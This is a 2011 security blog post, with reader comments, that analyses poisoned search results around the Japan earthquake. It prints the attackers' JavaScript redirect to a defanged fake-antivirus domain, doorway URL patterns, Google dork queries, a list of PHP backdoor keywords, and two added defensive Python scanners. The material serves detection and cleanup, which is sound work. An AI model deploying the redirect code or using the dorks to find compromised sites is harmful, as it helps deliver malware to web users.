
Major Disasters in Poisoned Search Results

   14 Mar 11   Filed in Website exploits

Only a few hours after Friday’s 8.9 earthquake and the tsunami that followed it hit Japan, security researchers noticed many poisoned Google search results for news searches about the event that redirected web surfers to fake antivirus sites.

This situation is nothing new. We’ve seen similarly poisoned search results for the Haitian earthquake a year ago, for the recent New Zealand earthquake, for last year’s floods in Pakistan, etc.

Many people use search engines to find details about breaking news such as natural disasters, catastrophes, accidents, etc. Such hard-to-predict events have literally zero relevant results before they happen, so during the first few hours after the event almost any site with relevant information has a good chance to rank high on Google. This short window, when competition is quite light, is all cyber-criminals need to get steady traffic to their breaking-news doorway pages. Then, when every news site and blog adds its 2 cents and there are plenty of resources about those hot topics, only the most reputable and most relevant web pages make it to the top of the search results.

I decided to check the poisoned search results and here’s what I found:

1. Compromised legitimate websites

Hackers create doorway pages on compromised legitimate websites. They have many reasons to do so. Pages on established sites usually rank better. Moreover, it’s the clueless site owners who pay for domains, servers and bandwidth.

2. Cloaking

They use a black hat SEO technique called cloaking to provide search engines with one version of the content (news related, stuffed with relevant keywords) and different content to web surfers who come from search engines (a redirect to a malicious site). Visitors who don’t come from search engines usually see a blank page or a 404 error (page not found).

For example, here’s what Googlebot sees (via Google cache):

[Screenshot: Most Recent Earthquakes in Japan]

And here is what web surfers see when they click on poisoned search results:

[Screenshot: Fake AV]

3. JavaScript redirects

To redirect visitors to malicious sites, hackers use (in this particular attack) the following JavaScript:

var url = "hxxp://www3.addfreeprotectionwa .cz.cc/?6212ee=m%2Bzgl2uTlp2emNXO1K%2BimtnX4KbVn6%2BWkJOrYpuaa1Y%3D";
if (window!=top) {top.location.href = url;}
//else document.location= url;

(Infamous .cc domains. In some cases I’ve seen “*.rr.nu” domains.) The domain names of the malicious sites change regularly, which proves that hackers actively control the compromised websites.

4. Old WordPress

The majority of the compromised sites are WordPress blogs that use old versions of WP (e.g. 2.5.x and 2.6.x).

5. URL patterns

The most common URL pattern of the doorway pages is hxxp://example .com/wp-admin/images/logos.php?itemid=keywords

Some other, less prevalent, patterns are:

wp-admin/import/rs.php?itemid
wp-admin/import/st.php?itemid
wp-admin/import/dotcl.php?itemid
wp-admin/includes/pos.php?itemid
wp-admin/includes/med.php?itemid
wp-includes/images/smilies/icon_sa.php?itemid
wp-includes/var.php?itemid?itemid
wp-includes/images/crystal/cod.php?itemid
wp-content/plugins/sociable/images/liv.php?itemid
wp-content/uploads/2008/12/logos.php?itemid
...

As you can see, all these patterns use .php files that clearly break WordPress conventions. For example:

  • there shouldn’t be any public indexable pages in /wp-admin and /wp-includes directories
  • the files are not core WordPress files and users are not supposed to change anything inside /wp-admin and /wp-includes directories
  • while it is a normal practice to add custom files into /wp-content directory, it’s very suspicious to see .php files in images directories
  • it is even more suspicious to see .php files in the uploads directories — which may be a strong sign of a site compromise.
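As an added example (not from the original post), here is a Python script that applies the conventions above to web server access logs: it flags requests for .php files inside images/ or uploads/ directories, and requests for wp-admin/ or wp-includes/ files carrying the doorway’s ?itemid= keywords, and records whether the visitor arrived from a search engine. The log lines are constructed for the example and the regex assumes Apache’s combined log format.

```python
import re
from urllib.parse import urlparse

# Apache "combined" log format; the referrer field shows whether the visitor arrived from a search engine.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# WordPress conventions from the post: no public pages under wp-admin/ or wp-includes/,
# and no .php files inside images/ or uploads/ directories.
CORE_DIRS = ("/wp-admin/", "/wp-includes/")
MEDIA_PHP_RE = re.compile(r"/(images|uploads)/[^?]*\.php$", re.IGNORECASE)
SEARCH_ENGINES = ("google.", "bing.", "yahoo.")

def classify_request(path):
    """Return why a request path looks like a doorway hit, or None for normal traffic."""
    url = urlparse(path)
    if not url.path.lower().endswith(".php"):
        return None
    if MEDIA_PHP_RE.search(url.path):
        return "php file in an images/ or uploads/ directory"
    # Legitimate admin traffic (admin-ajax.php etc.) never carries the doorway's ?itemid= keywords.
    if url.path.startswith(CORE_DIRS) and "itemid" in url.query:
        return "core-directory php requested with ?itemid= keywords"
    return None

def scan_log(lines):
    """Return one record per suspicious request: client IP, path, reason, and search-engine referral flag."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        reason = classify_request(m["path"])
        if reason is None:
            continue
        ref_host = urlparse(m["referer"]).netloc.lower()
        hits.append({"ip": m["ip"], "path": m["path"], "reason": reason,
                     "from_search": any(s in ref_host for s in SEARCH_ENGINES)})
    return hits

# Constructed sample log lines (not real traffic); the paths follow the patterns listed in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Mar/2011:10:01:02 +0000] "GET /wp-admin/images/logos.php?itemid=most+recent+earthquake+japan HTTP/1.1" 200 5120 "http://www.google.com/search?q=most+recent+earthquake+japan" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Mar/2011:10:02:15 +0000] "GET /wp-content/uploads/2008/12/logos.php?itemid=tsunami HTTP/1.1" 200 4990 "http://www.google.co.jp/search?q=tsunami" "Mozilla/5.0"',
    '203.0.113.8 - - [14/Mar/2011:10:05:00 +0000] "GET /wp-includes/var.php?itemid=haiti+earthquake HTTP/1.1" 200 5000 "http://www.bing.com/search?q=haiti+earthquake" "Mozilla/5.0"',
    '192.0.2.5 - - [14/Mar/2011:10:03:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 30 "http://example.com/wp-admin/post.php" "Mozilla/5.0"',
    '192.0.2.6 - - [14/Mar/2011:10:04:00 +0000] "GET /wp-content/uploads/2011/03/photo.jpg HTTP/1.1" 200 81920 "-" "Mozilla/5.0"',
]
```

Calling scan_log(SAMPLE_LOG) returns three records, all with from_search set, while the admin-ajax.php and photo.jpg requests are left alone.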

6. Prevalence estimates

Given that the URL patterns of the doorway pages differ from legitimate WordPress URL patterns, we can use Google’s inurl search operator to estimate the scale of this problem.

For example, for the [inurl:"wp-admin * php itemid"] search, Google currently returns 22 million results (warning: don’t click on search results).

[Screenshot: 22 million results]

I estimate that more than 90% of them are malicious backdoor pages.

Most of them target various “hot news” topics. Let’s check how many of them mention disasters: ["inurl:wp admin images logos php" disaster]

[Screenshot: disaster doorways]

At this point I can see almost 1.5 million doorway results about disasters — this sort of news is probably the most “profitable” for criminals, since people shocked by the news are less likely to look at what links they are clicking on.

Now a more specific query: ["inurl:wp admin images logos php" "most recent earthquake"] – 1,750 doorways that cover many high seismic risk regions: California, Japan, Taiwan, Chile, New Zealand, etc.

To find the number of indexed doorway pages on individual compromised websites I used ["inurl:wp admin images logos php" site:example.com] searches (replacing “example.com” with actual domain names). The average is about 20,000 indexed doorway pages per site. On some sites this number is as high as 100,000. On others it may be just a couple of thousand.

In any case, we can see that hackers generate at least several dozen new doorway pages on each compromised site every day, targeting all sorts of news topics. So every day they have quite a steady stream of clueless web searchers who use Google to learn more about hot news: from disasters to the latest rumors about celebrities.

7. Lack of malware warnings

To protect web searchers from security risks, Google displays the “This site may harm your computer” warning on search results from known blacklisted sites. Web browsers like Firefox, Safari and Google Chrome also display similar warnings when people try to open such sites.

Unfortunately, at this moment Google is aware of only about 5% of websites with such malicious backdoor pages, so don’t expect them to warn you.

To Google

Come on Google, I’m sure you are aware of this problem. Why not feed the results of the [inurl:"wp-admin * php itemid"] query to your malware scanners?

Bonus: understanding the WordPress URL structure, we can easily reveal some other poisoned search results. E.g. ["inurl:wp admin images * php" -logos] currently returns 327,000 search results and I can clearly see another malware attack that uses the “/wp-admin/images/dating/index.php?” URL pattern (again, most of them are not blacklisted yet).

To web searchers

Look before you click on search results. Especially if you are searching for the latest news, at least ask yourself whether the site can be a source of trustworthy information about the topic. Pay special attention to the link pattern — Google displays it for a good reason.

To webmasters

1. Make sure all third party applications that you use on your web sites are up-to-date and fully patched. Using an old version of WordPress is like an invitation to hackers to abuse your site.

2. Regularly check which pages of your site are indexed. Use either Google Webmaster Tools or the [site:example.com] Google search (replace example.com with your site’s domain name). You may find some unexpected pages there.

3. Regularly check what search keywords people use to find your site. Google Analytics is not enough here, as the doorway pages don’t contain your tracking code. You should either analyze raw server logs (or any log-based statistics) or check the “Search queries” and “Keywords” reports in Google Webmaster Tools — you may discover that your site ranks for quite unrelated keywords.

4. If your site happens to be one of the compromised blogs, not only should you remove those doorway files (e.g. “wp-admin/images/logos.php”) but also find and remove backdoor files that hackers have uploaded to your server. Here are some keywords to search for: “eval”, “base64_decode”, “edoced_46esab”, “gzinflate”, “gzuncompress”, “eval(stripslashes”, “FilesMan”.
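As an added example, not part of the original post, the following Python script carries out step 4’s check on a WordPress directory tree: it lists .php files found under images/ or uploads/ directories and searches every .php file for the backdoor keywords above. It builds a small constructed sample tree in a temporary directory so it runs offline; a real scan would pass the site’s document root to scan_wordpress_tree, and every keyword hit still needs manual review because some of these functions also occur in legitimate code.

```python
import os
import re
import tempfile

# Backdoor indicators listed in the post; "edoced_46esab" is base64_decode spelled backwards,
# a common obfuscation trick. Longest keyword first so "eval(stripslashes" wins over plain "eval".
BACKDOOR_KEYWORDS = ("eval", "base64_decode", "edoced_46esab", "gzinflate",
                     "gzuncompress", "eval(stripslashes", "FilesMan")
KEYWORD_RE = re.compile("|".join(re.escape(k) for k in sorted(BACKDOOR_KEYWORDS, key=len, reverse=True)))
# By WordPress convention a .php file under any images/ or uploads/ directory is out of place.
MEDIA_DIRS = {"images", "uploads"}

def scan_wordpress_tree(root):
    """Return (misplaced, keyword_hits): .php files in media dirs, and files containing backdoor keywords."""
    misplaced, keyword_hits = [], {}
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        parts = set(rel_dir.split("/"))
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            rel = f"{rel_dir}/{name}" if rel_dir != "." else name
            if parts & MEDIA_DIRS:
                misplaced.append(rel)
            with open(os.path.join(dirpath, name), "r", encoding="utf-8", errors="replace") as fh:
                found = sorted(set(KEYWORD_RE.findall(fh.read())))
            if found:
                keyword_hits[rel] = found
    return sorted(misplaced), keyword_hits

def build_sample_tree(root):
    """Constructed sample, not a real compromised site: one doorway, one backdoor, two clean files."""
    samples = {
        "wp-admin/images/logos.php": "<?php $k = $_GET['itemid']; echo $k;",
        "wp-content/uploads/2008/12/logos.php": "<?php eval(gzinflate(base64_decode('PAYLOAD')));",
        "wp-content/themes/sample/functions.php": "<?php function sample_setup() { add_theme_support('menus'); }",
        "wp-content/uploads/2011/03/photo.jpg": "not php",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)

def demo():
    """Build the sample tree in a temp dir and scan it; returns (misplaced, keyword_hits)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_wordpress_tree(root)
```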

Do you have anything to add?

In this post I covered only one type of Google results poisoning for news related searches. Have you seen any other similar black hat SEO campaign? Have you identified other Google searches that mainly return links to malicious web pages? Your information and comments are welcome.

Reader's Comments (4)

  1.

    [...] Major Disasters in Poisoned Search Results, Unmask Parasites. Blog. [...]

  2.

    I would love to know what you recommend should you land on such a page.

    •

      Most of such pages (fake anti-virus) are not malicious. Nothing will happen if you don’t agree to download and install that software. Just close the page, warnings and download dialog boxes. Always choose “Cancel”, never “OK”.

      I also suggest that you use the NoScript extension with the latest version of Firefox. In this case you will not even see the warnings since all those scam sites extensively use JavaScript.

      •

        Thx. I’m usually VERY careful about doing just that – but I got hit with that very thing.

        I couldn’t “X” it out. So I shut down my computer and was still infected.

        I was using IE 8. Maybe I should use FF more often. :-)